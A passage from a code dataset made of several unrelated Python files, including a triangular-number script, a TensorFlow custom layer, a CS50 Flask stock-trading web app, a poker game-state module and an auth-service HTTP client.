#\nif __name__ == '__main__':\n # parsing arguments\n parser = argparse.ArgumentParser(\n description='Find triangular number')\n parser.add_argument('-n','--number', type=int,\n help='integer')\n args = parser.parse_args()\n\n # checking if given nuber is positive\n if args.number <= 0:\n print('argument must be positive intiger')\n sys.exit()\n\n # calcuating value of given number\n #T = (n)(n + 1) / 2.\n out = int(args.number *(args.number + 1) / 2)\n \n # printing output\n print('given number:', args.number)\n print('triangular number:', out)","sub_path":"PC70_Triangle_Number_Calculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"315028433","text":"\"\"\"\nIn some applications of a binary tree, only the leaf nodes contain\nactual information. For example, in a single knockout tournament\norganized as a binary tree, we can link the leaves to get\na list of participants\n\nGiven a binary tree write a function which forms a linked list\nfrom the leaves of the binary tree. The leaves should appear in left to\nright order\n\nInitial thoughts:\ninorder traverse trees using a stack and link the lists\n\"\"\"\n\n# Recursive situation\n# Appending to list should be O(1) in practical implementations (pointer to tail)\n\ndef connect_leaves(node, L):\n if node:\n if not node.left and not node.right:\n L.append(node)\n else:\n connect_leaves(node.left, L)\n connect_leaves(node.right, L)\n\n","sub_path":"interview/elementsofpi/ch9/9.9.py","file_name":"9.9.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"510544077","text":"import numpy as np\n\nfrom entities.human_being import human_being\n\n\nclass simple_sampler_by_size:\n def __init__(self, sample_size):\n self.sample_size = sample_size\n\n def sample_from_humans(self, human_list):\n humans_data = []\n for human in human_list:\n shuffled_cells = human.cells_features\n sample_size = self.sample_size\n np.random.shuffle(shuffled_cells)\n humans_data.append(human_being(shuffled_cells[0:sample_size], fcs_file=human.fcs_file, file_idx=human.human_idx))\n return humans_data\n","sub_path":"samplers/simple_sampler_by_size.py","file_name":"simple_sampler_by_size.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7376363","text":"import tensorflow as tf\r\n\r\n\r\nclass Linear(tf.keras.layers.Layer):\r\n\r\n def __init__(self, units, input_dim):\r\n super(Linear, self).__init__()\r\n w_init = tf.random_normal_initializer()\r\n self.w = tf.Variable(initial_value=w_init(shape=(input_dim, units),\r\n dtype='float32'),\r\n trainable=True)\r\n b_init = tf.zeros_initializer()\r\n self.b = tf.Variable(initial_value=b_init(shape=(units,),\r\n dtype='float32'),\r\n trainable=True)\r\n\r\n def call(self, inputs):\r\n return tf.matmul(inputs, self.w) + self.b\r\n\r\n\r\nlinear_layer = Linear(4,2)\r\nprint(linear_layer(tf.ones((2, 2))))\r\nprint(linear_layer.w)\r\nprint(linear_layer.b)\r\n'''\r\ntf.Tensor(\r\n[[-0.04408899 -0.02287596 0.04922538 0.01446066]\r\n [-0.04408899 -0.02287596 0.04922538 0.01446066]], shape=(2, 4), dtype=float32)\r\n\r\n\r\n'''","sub_path":"tensorflow basics/custom_layer_with_bias.py","file_name":"custom_layer_with_bias.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"643076324","text":"import Client\n\nclass distData:\n\n def __init__(self, dist, time, angle):\n self.dist = dist\n self.time = time\n self.angle = angle\n\n def send(self):\n client = Client.Client()\n message = ';'.join([str(self.dist), str(self.time), str(self.angle)])\n print(message)\n client.SendData(message)\n\n\nif __name__ == \"__main__\":\n tmp = distData(0.5, 0, 90) \n tmp.send()\n","sub_path":"dist_sensor.py","file_name":"dist_sensor.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156360580","text":"import os\nimport datetime\nimport re\n\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session, url_for\n# cannot use in check50ch\n# from flask_mail import Mail, Message\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom itsdangerous import TimedJSONWebSignatureSerializer as Serializer\nfrom helpers import apology, login_required, lookup, usd\n\nTEMPLATES_AUTO_RELOAD = True\n\n# Ensure environment variable is set\nif not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n\n# Configure application\napp = Flask(__name__)\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n# app.config.from_object(__name__)\napp.config.from_pyfile(\"flask.cfg\")\n\napp.config.update(\n MAIL_SERVER=app.config['MAIL_SERVER'],\n MAIL_PORT=app.config['MAIL_PORT'],\n MAIL_USE_SSL=app.config['MAIL_USE_SSL'],\n MAIL_USERNAME=app.config['MAIL_USERNAME'],\n MAIL_PASSWORD = app.config['MAIL_PASSWORD']\n)\n# print(app.config.MAIL_SERVER)\n# print(app.config.MAIL_PORT)\n# print(app.config.MAIL_USE_SSL)\n# print(app.config.MAIL_USERNAME)\n# print(app.config.MAIL_PASSWORD)\n# Ensure responses aren't cached\n@app.after_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# mail = Mail(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\n# PERSONAL TOUCH - pw reset does not work with check50\n# # make token to send in emal\n# def get_reset_token(user_id, expires_sec=1800):\n# # takes in user_id and makes it a token\n# s = Serializer(app.config['SECRET_KEY'], expires_sec)\n# return s.dumps({'user_id': user_id}).decode('utf-8')\n\n# # verify the token when user clicks the link\n# def verify_reset_token(token):\n# print(f\"token:{token}\")\n# s = Serializer(app.config['SECRET_KEY'])\n# print(f\"s:{s}\")\n# try:\n# user_id = s.loads(token)['user_id']\n# user_id = user_id[0]['id']\n# print(f\"user_id:{user_id}\")\n# except:\n# return None\n# # get back user id and verify it is correct\n# return db.execute(\"SELECT id from USERS where id=(:user_id)\", user_id=user_id)\n\n\n# # reset instructions learned here- https://www.youtube.com/watch?v=vutyTx7IaAI\n# @app.route(\"/reset_password\", methods=['GET', 'POST'])\n# def reset_request():\n# # form = ContactForm()\n# if request.method == 'GET':\n# return render_template('reset_password.html')\n# elif request.method == 'POST':\n# if not request.form.get(\"email\"):\n# return apology(\"must provide email\", 400)\n# # check that is email syntax\n# email = request.form.get(\"email\")\n# if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n# flash(\"Not valid email syntax\")\n# # # get email from form\n# return render_template(\"reset_password.html\")\n# # # check DB for email\n# email_check = db.execute(\"SELECT email FROM users WHERE email=(:email)\", email=email)\n# print(f\"email_check: {email_check}\")\n# user_id = db.execute(\"SELECT id FROM users WHERE email=(:email)\", email=email)\n# token = get_reset_token(user_id)\n# # check if user in db\n# if email_check != [] and email_check != None:\n# verify = verify_reset_token(token)\n# # print(f\"verify: {verify}\")\n# msg = Message(\"This is an automated email for resetting your password\",\n# sender=app.config['MAIL_USERNAME'],\n# recipients=[email])\n# msg.body = f'''Click on the link to reset your password.\n# {url_for('reset_token', token=token, _external=True)}\n\n# If you did not request this email, ignore it.\n# '''\n# mail.send(msg)\n# flash(\"email sent\")\n# else:\n# flash(\"That email is not registred\")\n# return render_template(\"reset_password.html\")\n\n# @app.route(\"/password_reset/\", methods=['GET', 'POST'])\n# def reset_token(token):\n# # call verify token- return user\n# user = verify_reset_token(token)\n# user_id = user[0]['id']\n# if request.method == 'GET':\n# if not user:\n# flash(\"That is an invalid/Expired token.\", 'error')\n# return render_template(\"reset_password.html\")\n# # return redirect(url_for(\"reset_password\"))\n# # return redirect(url_for(\"index\"))\n# return render_template(\"password_token.html\", token=token)\n# elif request.method == 'POST':\n# if not request.form.get(\"password\"):\n# return apology(\"must provide new password\", 400)\n# elif not request.form.get(\"password\"):\n# return apology(\"must provide confrimation password\", 400)\n# elif request.form.get(\"password\") != request.form.get(\"confirmation\"):\n# return apology(\"new passwords must match\", 400)\n# else:\n# try:\n# # # # generate new password hash\n# hash = generate_password_hash(request.form.get(\"password\"), method='pbkdf2:sha256', salt_length=8)\n# db.execute(\"UPDATE users SET hash=(:hash) WHERE id=(:user_id)\", hash=hash, user_id=user_id)\n# flash(\"Password changed\")\n# return render_template(\"login.html\")\n\n# except:\n# raise ValueError (\"An error occured on hash entry\")\n# flash(\"An error occured\")\n# return render_template(\"login.html\")\n\n\"\"\"Show portfolio of stocks\"\"\"\n@app.route(\"/\")\n@login_required\ndef index():\n user_id = session['user_id']\n # select all assets\n assetData = db.execute(\"SELECT * FROM assets WHERE user_id=(:user_id)\", user_id=user_id)\n # select cash\n cash = db.execute(\"SELECT cash FROM users WHERE id=(:id)\", id=user_id)\n cash = cash[0]['cash']\n # loop through data and round all the totals\n for datum in assetData:\n # round and add usd\n datum['total'] = usd(round(datum['total'],2))\n # add usd\n cash = usd(round(cash, 2))\n return render_template(\"index.html\", data=assetData, cash=cash)\n\n\n# return the purchase ID for buy and sell\ndef purchaseID():\n last_purchase_id = db.execute(\"SELECT MAX(purchase_id) from purchases\")\n # extract from list and dict\n last_purchase_id = last_purchase_id[0]['MAX(purchase_id)']\n # if no IDs, make first = 1\n if last_purchase_id == None:\n # print(\"no ids yet, set to one\")\n current_purchase_id = 1\n # add one to get id for this purchase\n elif last_purchase_id != None:\n # print('ids there. increment')\n current_purchase_id = last_purchase_id + 1\n # print(f\"last id:{last_purchase_id}\")\n # print(f\"current id:{current_purchase_id}\")\n return current_purchase_id\n\n\n\"\"\"Buy shares of stock\"\"\"\n@app.route(\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n user_id = session['user_id']\n if request.method == 'POST':\n if not request.form.get(\"symbol\") or not request.form.get('shares'):\n return apology(\"Must fill in both fields.\", 400)\n else:\n # get form values\n symbol = request.form.get(\"symbol\")\n symbol = symbol.upper()\n shares = request.form.get(\"shares\")\n # error handling - fraction/decimals return ValueError\n try:\n shares = int(shares)\n if shares < 0:\n return apology(\"Cannot purchase negative shares.\", 400)\n except ValueError:\n # print(\"Could not convert\")\n return apology(\"Only integers a can be entered.\", 400)\n # get API INFO\n look_up = lookup(symbol)\n # print(f\"lookup:{look_up}\")\n if look_up == None:\n return apology(\"Not a valid ticker symbol.\", 400)\n elif look_up != None:\n price = look_up['price']\n # get users cash\n cash = db.execute(\"SELECT cash FROM users WHERE (:id)=id\", id=user_id)\n cash = cash[0]['cash']\n # print(f\"cash: {cash}\")\n # calculate total price of shares\n sharesValue = price * shares\n # see if user has the money\n cash_after_shares = cash - sharesValue\n if cash_after_shares >= 0:\n current_purchase_id = purchaseID()\n # get date\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n # print(f\"date: {current_date}\")\n # print(f\"shares: {shares}\")\n # print(f\"symbol: {symbol}\")\n # print(f\"price: {price}\")\n # print(f\"sharesValue: {sharesValue}\")\n # print(f\"user_id: {user_id}\")\n # print(f\"date: {current_date}\")\n # print(f\"purchase_id: {current_purchase_id}\")\n # CHECK if user has that stock already\n check = db.execute(\"SELECT symbol FROM purchases WHERE symbol=(:symbol)\", symbol=symbol)\n # not already in table\n # print(f\"check: {check}\")\n if check == []:\n # print(\"Symbol not there. Add to both tables\")\n # INSERT - insert new row with all purchase table\n db.execute(\"INSERT INTO purchases (user_id, shares, symbol, purchase_id, value, date, share_value, type) VALUES (:user_id, :shares, :symbol, :purchase_id, :value,:date, :share_value, :type)\", user_id=user_id, shares=shares, symbol=symbol,purchase_id=current_purchase_id, value=sharesValue,date=current_date, share_value=price, type=\"buy\")\n # INSERT - insert new row into assets table\n db.execute(\"INSERT INTO assets (user_id, symbol, shares, total) VALUES (:user_id, :symbol, :shares, :value)\", user_id=user_id, shares=shares, symbol=symbol, value=sharesValue)\n # update user cash after purchase\n db.execute(\"UPDATE users SET cash=(:cash) WHERE id=(:user_id)\", cash=cash_after_shares,user_id=user_id)\n # flash on success\n flash(\"New stock added.\")\n # redirect to index\n return redirect(url_for(\"index\"))\n else:\n # print('Symnol there. Add to purchase, update assets.')\n # INSERT - insert new row into purchase table\n db.execute(\"INSERT INTO purchases (user_id, shares, symbol, purchase_id, value, date, share_value, type) VALUES (:user_id, :shares, :symbol, :purchase_id, :value,:date, :share_value, :type)\", user_id=user_id, shares=shares, symbol=symbol,purchase_id=current_purchase_id, value=sharesValue,date=current_date, share_value=price, type=\"buy\")\n # SELECT - current valuees from assets\n # get shares and value already there\n currentValues = db.execute(\"SELECT shares, total FROM assets WHERE user_id=(:user_id)\", user_id=user_id)\n #UPDATE - update the assets table\n # returns a list - get dict out of list\n currentValues = currentValues[0]\n currentShares = currentValues['shares']\n currentTotal = currentValues['total']\n # add new vals to old ones\n newShares = currentShares + shares\n newTotal = currentTotal + sharesValue\n db.execute(\"UPDATE assets SET shares=(:shares), total=(:total) WHERE symbol=(:symbol) AND user_id=(:user_id)\", shares=newShares, total=newTotal, symbol=symbol, user_id=user_id)\n # UPDATE user cash after purchase\n db.execute(\"UPDATE users SET cash=(:cash) WHERE id=(:user_id)\", cash=cash_after_shares,user_id=user_id)\n # FLASH\n flash(\"New stocks added, or combined with others of the same type.\")\n # redirect to index\n return redirect(url_for(\"index\"))\n # purchase not approved\n else:\n # FLASH\n # print(\"insufficient funds\")\n return redirect(url_for(\"index\"))\n # GET REQUEST\n elif request.method == \"GET\":\n return render_template(\"buy.html\", method=request.method)\n else:\n return apology(\"Request must be a GET or a POST\", 400)\n\n\n\"\"\"Show history of transactions\"\"\"\n@app.route(\"/history\")\n@login_required\ndef history():\n user_id = session['user_id']\n purchaseData = db.execute(\"SELECT symbol, shares, value, date FROM purchases WHERE user_id=(:user_id)\", user_id=user_id)\n # loop over shares vals to round numbers\n for datum in purchaseData:\n if(datum['value'] > 0):\n datum['value'] = round(datum['value'],2)\n else:\n datum['value'] = datum['value']\n # call usd\n datum['value'] = usd(datum['value'])\n\n return render_template(\"history.html\", data=purchaseData)\n\n\n# VERSION for use with PW func\n# @app.route(\"/login\", methods=[\"GET\", \"POST\"])\n# def login():\n# # Forget any user_id\n# session.clear()\n\n# # User reached route via POST (as by submitting a form via POST)\n# if request.method == \"POST\":\n\n# # Ensure email was submitted\n# if not request.form.get(\"email\"):\n# return apology(\"must provide email\", 403)\n\n# # Ensure password was submitted\n# elif not request.form.get(\"password\"):\n# return apology(\"must provide password\", 403)\n\n# # Query database for email\n# rows = db.execute(\"SELECT * FROM users WHERE email = :email\",\n# email=request.form.get(\"email\"))\n\n# # Ensure email exists and password is correct\n# if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n# return apology(\"invalid email and/or password\", 403)\n\n# # Remember which user has logged in\n# session[\"user_id\"] = rows[0][\"id\"]\n# # print('login successful')\n\n# # Redirect user to home page\n# return redirect(\"/\")\n\n# # User reached route via GET (as by clicking a link or via redirect)\n# else:\n# return render_template(\"login.html\")\n\n\"\"\"Log user in\"\"\"\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure email was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 403)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 403)\n\n # Query database for email\n rows = db.execute(\"SELECT * FROM users WHERE email = :email\",\n email=request.form.get(\"username\"))\n\n # Ensure email exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid email and/or password\", 403)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n # print('login successful')\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\n\"\"\"Get stock quote.\"\"\"\n@app.route(\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n if request.method == 'POST':\n if not request.form.get(\"symbol\"):\n return apology(\"Form cannot be blank.\", 400)\n else:\n symbol = request.form.get(\"symbol\")\n symbol = symbol.upper()\n result = lookup(symbol)\n if result == None:\n return apology(\"Not a valid ticker symbol.\", 400)\n else:\n # run price through usd function\n result['price'] = usd(result['price'])\n return render_template(\"quote.html\", quote=result, method=request.method)\n elif request.method == 'GET':\n return render_template(\"quote.html\", method=request.method)\n\n\n# VERSION for if PW reset is turned on\n# @app.route(\"/register\", methods=[\"GET\", \"POST\"])\n# def register():\n# # user GET, then just render template\n# if request.method == \"POST\":\n# if not request.form.get(\"email\"):\n# return apology(\"must provide email\", 400)\n# if not request.form.get(\"password\"):\n# return apology(\"must provide password\", 400)\n# elif request.form.get(\"password\") != request.form.get(\"confirmation\"):\n# return apology(\"passwords must match\", 400)\n\n# email = request.form.get(\"email\")\n# # # generate password hash\n# hash = generate_password_hash(request.form.get(\"password\"), method='pbkdf2:sha256', salt_length=8)\n# # check that is email syntax\n# if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n# flash(\"Not valid email syntax\")\n# return render_template(\"register.html\")\n# email_query = db.execute(\"SELECT email FROM users WHERE email=(:email)\", email=email)\n# if email_query != []:\n# return apology(\"That email already exists. Choose another.\", 400)\n\n# db.execute(\"INSERT INTO users (email,hash) VALUES (:email, :hash)\", email=email, hash=hash)\n# user_id = db.execute(\"SELECT id FROM users WHERE email=(:email)\", email=email)\n# session[\"user_id\"] = user_id\n# flash(\"You are registed.\")\n# return render_template(\"index.html\")\n\n# elif request.method == \"GET\":\n# return render_template('register.html')\n# else:\n# return \"Request type not valid\"\n\n\"\"\"Register user\"\"\"\n@app.route(\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n # user GET, then just render template\n if request.method == \"POST\":\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 400)\n if not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n elif request.form.get(\"password\") != request.form.get(\"confirmation\"):\n return apology(\"passwords must match\", 400)\n\n email = request.form.get(\"username\")\n # # generate password hash\n hash = generate_password_hash(request.form.get(\"password\"), method='pbkdf2:sha256', salt_length=8)\n # # check that is email syntax\n # if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", email):\n # flash(\"Not valid email syntax\")\n # return render_template(\"register.html\")\n email_query = db.execute(\"SELECT email FROM users WHERE email=(:email)\", email=email)\n if email_query != []:\n return apology(\"That email already exists. Choose another.\", 400)\n\n db.execute(\"INSERT INTO users (email,hash) VALUES (:email, :hash)\", email=email, hash=hash)\n user_id = db.execute(\"SELECT id FROM users WHERE email=(:email)\", email=email)\n session[\"user_id\"] = user_id\n flash(\"You are registed.\")\n return render_template(\"index.html\")\n\n elif request.method == \"GET\":\n return render_template('register.html')\n else:\n return \"Request type not valid\"\n\n\n\"\"\"Sell shares of stock\"\"\"\n@app.route(\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n # print('SELL')\n user_id = session['user_id']\n # get value in assets\n assets = db.execute(\"SELECT * FROM assets WHERE user_id=(:user_id)\", user_id=user_id)\n if request.method == 'GET':\n return render_template(\"sell.html\", data=assets)\n elif request.method == 'POST':\n # get input symbol\n symbol = request.form.get(\"symbol\")\n # get input shares to sell\n shares_to_sell = request.form.get(\"shares\")\n # print(f\"symbol:{symbol}\")\n # print(f\"shares_to_sell:{shares_to_sell}\")\n # input must be a string\n # if type(shares_to_sell) != str:\n try:\n # convert to int\n shares_to_sell = int(shares_to_sell)\n except ValueError:\n flash(\"Error: Input is invalid or empty\")\n return render_template(\"sell.html\", data=assets)\n\n # get shares cuurent in table\n sharesData = db.execute(\"SELECT shares FROM assets WHERE symbol=(:symbol) AND user_id=(:user_id)\", user_id=user_id, symbol=symbol)\n sharesData = sharesData[0]['shares']\n # current amount minus ones sehling\n new_shares_amount = sharesData - shares_to_sell\n # print(f\"symbol:{symbol}\")\n # print(f\"shares_to_sell:{shares_to_sell}\")\n # print(f\"current shares: {sharesData}\")\n # print(f\"new_shares_amount:{new_shares_amount}\")\n # lookup share value at API to get price\n look_up = lookup(symbol)\n look_up_price = look_up['price']\n # print(f\"price:{look_up_price}\")\n # value of sold shares - number sold * price each\n selling_cash = look_up_price * shares_to_sell\n if new_shares_amount < 0:\n # print(\"Don't have that many shares\")\n return apology(\"Not enough shares\", 400)\n else:\n # insert trans into purchases table\n current_purchase_id = purchaseID()\n current_date = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n db.execute(\"INSERT INTO purchases (user_id, shares, symbol, purchase_id, value, date, share_value, type) VALUES (:user_id, :shares, :symbol, :purchase_id, :value,:date, :share_value, :type)\", user_id=user_id, shares=(shares_to_sell * -1), symbol=symbol,purchase_id=current_purchase_id, value=(selling_cash * -1), date=current_date, share_value=look_up_price, type=\"sell\")\n # change share number in table\n db.execute(\"UPDATE assets SET shares=(:new_shares_amount) WHERE symbol=(:symbol) AND user_id=(:user_id)\", new_shares_amount=new_shares_amount, user_id=user_id, symbol=symbol)\n # change total value - multiply remaining shares * price\n currentTotal = db.execute(\"SELECT total FROM assets WHERE symbol=(:symbol) AND user_id=(:user_id)\", user_id=user_id, symbol=symbol)\n new_total = new_shares_amount * look_up_price\n # print(f\"currentTotal:{currentTotal}\")\n # print('new_shares_amount * look_up_price = new_total')\n # print(f\"new_total: {new_total}\")\n db.execute(\"UPDATE assets SET total=(:new_total) WHERE user_id=(:user_id) AND symbol=(:symbol)\", new_total=new_total, user_id=user_id, symbol=symbol)\n # get current cash\n current_cash = db.execute(\"SELECT cash FROM users WHERE id=(:user_id)\", user_id=user_id)\n current_cash = current_cash[0]['cash']\n # print(f\"current_cash: {current_cash}\")\n # perform addition\n updated_cash = current_cash + selling_cash\n # print(f\"updated_cash:{updated_cash}\")\n # update cash\n db.execute(\"UPDATE users SET cash=(:updated_cash) WHERE id=(:user_id)\", updated_cash=updated_cash, user_id=user_id)\n flash(\"Stocks sold\")\n return redirect(url_for(\"index\"))\n\n return render_template(\"sell.html\")\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n print(e)\n return\n\n\n# listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n\n","sub_path":"pset7/finance/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":24449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"134567900","text":"# coding=utf-8\nfrom uuid import uuid4\n\nfrom client_logging import LogLevel\n\n\nclass PokerGame:\n \"\"\"This helper class encapsulates the state of a poker game.\"\"\"\n ACTION = 'action'\n DEALT_CARD = 'dealt_card'\n FROM = 'ident'\n CARD_REVEAL = 'card_reveal'\n\n def __init__(self, max_players=3, blind=10):\n self.max_players = max_players\n self.blind = blind\n self.starting_cash = 200\n self.state_log = []\n self.dealer = 0\n self.last_raise = None\n\n def advance_to_next_dealer(self):\n # This code can be used in games where the\n # dealer moves *during* play.\n if self.dealer == self.max_players:\n self.dealer = 0\n else:\n self.dealer += 1\n\n def new_raise(self) -> str:\n self.last_raise = str(uuid4())\n return self.last_raise\n\n\nclass PokerPlayer:\n \"\"\"This class encapsulates the state of a player in the poker game \"\"\"\n POKER_PLAYER = 'poker_player'\n\n def __init__(self, ident, game: PokerGame):\n self.ident = ident\n self.game = game\n self.folded = False\n self.cash_in_hand = game.starting_cash\n self.cash_in_pot = 0\n self.did_play_blind_this_round = False\n self.last_raise_i_have_called = None\n self.hand = []\n self.winnings = 0\n\n def __str__(self):\n return \"Player: {},\\tCash in hand: {}, \\tCash in pot {}\".format(self.ident,\n self.cash_in_hand,\n self.cash_in_pot)\n\n @property\n def is_all_in(self):\n return self.cash_in_hand == 0\n\n def add_to_pot(self, amount: int) -> bool:\n if self.cash_in_hand >= amount:\n self.cash_in_hand -= amount\n self.cash_in_pot += amount\n return True\n raise ValueError(\"Tried to add more to pot than possible!\")\n\n def reset_blind_flag(self):\n self.did_play_blind_this_round = False\n\n def set_blind(self, logging_func, big_blind=True):\n self.did_play_blind_this_round = True\n if big_blind:\n\n self.game.state_log.append({\n PokerGame.FROM: self.ident,\n PokerGame.ACTION: BettingCodes.BIG_BLIND\n })\n logging_func(\n LogLevel.INFO,\n \"Player {} plays BIG blind\".format(\n self.ident))\n\n if self.cash_in_hand < self.game.blind * 2:\n logging_func(LogLevel.INFO, \"Going ALL IN for blind\")\n self.add_to_pot(self.cash_in_hand)\n else:\n self.add_to_pot(self.game.blind * 2)\n self.game.new_raise()\n else:\n self.game.state_log.append({\n PokerGame.FROM: self.ident,\n PokerGame.ACTION: BettingCodes.SMALL_BLIND\n })\n logging_func(\n LogLevel.INFO,\n \"Player {} plays SMALL blind\".format(\n self.ident))\n if self.cash_in_hand < self.game.blind:\n logging_func(LogLevel.INFO, \"^^ goes ALL IN for blind\")\n self.add_to_pot(self.cash_in_hand)\n else:\n self.add_to_pot(self.game.blind)\n\n\nfresh_deck = list(range(10, 62))\n\n\nclass PokerWords:\n WINNINGS = 'winnings'\n OPEN_CARDS = 'open_cards'\n HAND = 'hand'\n DECK_STATE = 'deck_state'\n SHUFFLE_PLAYERS = 'shuffle_players'\n CRYPTODECK_STATE = 'crypto_deck_state'\n\n\nclass BettingCodes:\n CALL = 'call'\n BET = 'bet'\n FOLD = 'fold'\n ALLIN = 'all_in'\n SKIP = 'skip'\n BIG_BLIND = 'big_blind'\n SMALL_BLIND = 'small_blind'\n","sub_path":"poker_rounds/poker_game.py","file_name":"poker_game.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348502470","text":"from dataclasses import dataclass, field\nfrom typing import Optional\n\nfrom pinject import annotate_arg\nfrom requests import Session\n\nfrom ..common.clients import HTTPServiceResponse, HTTPStatus\n\n\n@dataclass\nclass User:\n id: str\n email: Optional[str]\n created_at: Optional[str]\n updated_at: Optional[str]\n\n @staticmethod\n def from_response(user=None):\n if not user:\n return User()\n return User(\n id=user.get(\"id\"),\n email=user.get(\"email\"),\n created_at=user.get(\"createdAt\"),\n updated_at=user.get(\"updatedAt\"),\n )\n\n\nclass AuthService:\n PROTOCOL = \"http://\"\n LOGIN_ENDPOINT = \"/auth/login\"\n LOGIN_WITH_TOKEN_ENDPOINT = \"/auth/login-with-token\"\n REGISTER_ENDPOINT = \"/auth/register\"\n VALIDATE_TOKEN_ENDPOINT = \"/auth/validate-token\"\n\n @annotate_arg(\"hostport\", with_annotation=\"AUTH_SERVICE_HOSTPORT\")\n def __init__(self, hostport, http_conn_pool=None):\n self.hostport = hostport\n self.http_conn_pool = Session() if not http_conn_pool else http_conn_pool\n\n def login(self, email, password):\n login_response = self.http_conn_pool.post(\n self._build_url(self.LOGIN_ENDPOINT),\n json={\"email\": email, \"password\": password},\n )\n if login_response.status_code in (\n HTTPStatus.BAD_REQUEST,\n HTTPStatus.UNAUTHORIZED,\n ):\n return HTTPServiceResponse(status=login_response.status_code)\n\n data = login_response.json()\n user = User.from_response(data.get(\"user\"))\n tokens = data.get(\"tokens\", {})\n return HTTPServiceResponse({\"user\": user, \"tokens\": tokens})\n\n def login_with_token(self, token):\n login_response = self.http_conn_pool.post(\n self._build_url(self.LOGIN_WITH_TOKEN_ENDPOINT), json={\"token\": token}\n )\n if login_response.status_code in (\n HTTPStatus.BAD_REQUEST,\n HTTPStatus.UNAUTHORIZED,\n ):\n return HTTPServiceResponse(status=login_response.status_code)\n\n data = login_response.json()\n user = User.from_response(data.get(\"user\"))\n tokens = data.get(\"tokens\", {})\n return HTTPServiceResponse({\"user\": user, \"tokens\": tokens})\n\n def register(self, full_name, email, password):\n register_response = self.http_conn_pool.post(\n self._build_url(self.REGISTER_ENDPOINT),\n json={\"full_name\": full_name, \"email\": email, \"password\": password},\n )\n if register_response.status_code in (\n HTTPStatus.BAD_REQUEST,\n HTTPStatus.UNAUTHORIZED,\n ):\n return HTTPServiceResponse(status=register_response.status_code)\n\n data = register_response.json()\n user = User.from_response(data.get(\"user\"))\n tokens = data.get(\"tokens\", {})\n return HTTPServiceResponse({\"user\": user, \"tokens\": tokens})\n\n def validate_token(self, token):\n is_valid = self.http_conn_pool.get(\n self._build_url(self.VALIDATE_TOKEN_ENDPOINT),\n headers={\"Authorization\": f\"Bearer {token}\"},\n )\n if is_valid.status_code in (HTTPStatus.BAD_REQUEST, HTTPStatus.UNAUTHORIZED):\n return HTTPServiceResponse(status=is_valid.status_code)\n\n user = User.from_response(is_valid.json())\n return HTTPServiceResponse(user)\n\n def _build_url(self, endpoint):\n host = self.hostport[0]\n port = self.hostport[1]\n return f\"{self.PROTOCOL}{host}:{port}{endpoint}\"\n","sub_path":"src/clients/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"278943440","text":"import gibbs\nimport utils\n\nimport numpy as np\nfrom scipy.misc import logsumexp as lse\nfrom scipy.special import binom as bc #binomial coefficient\nfrom scipy.special import betaln #logarithm of beta 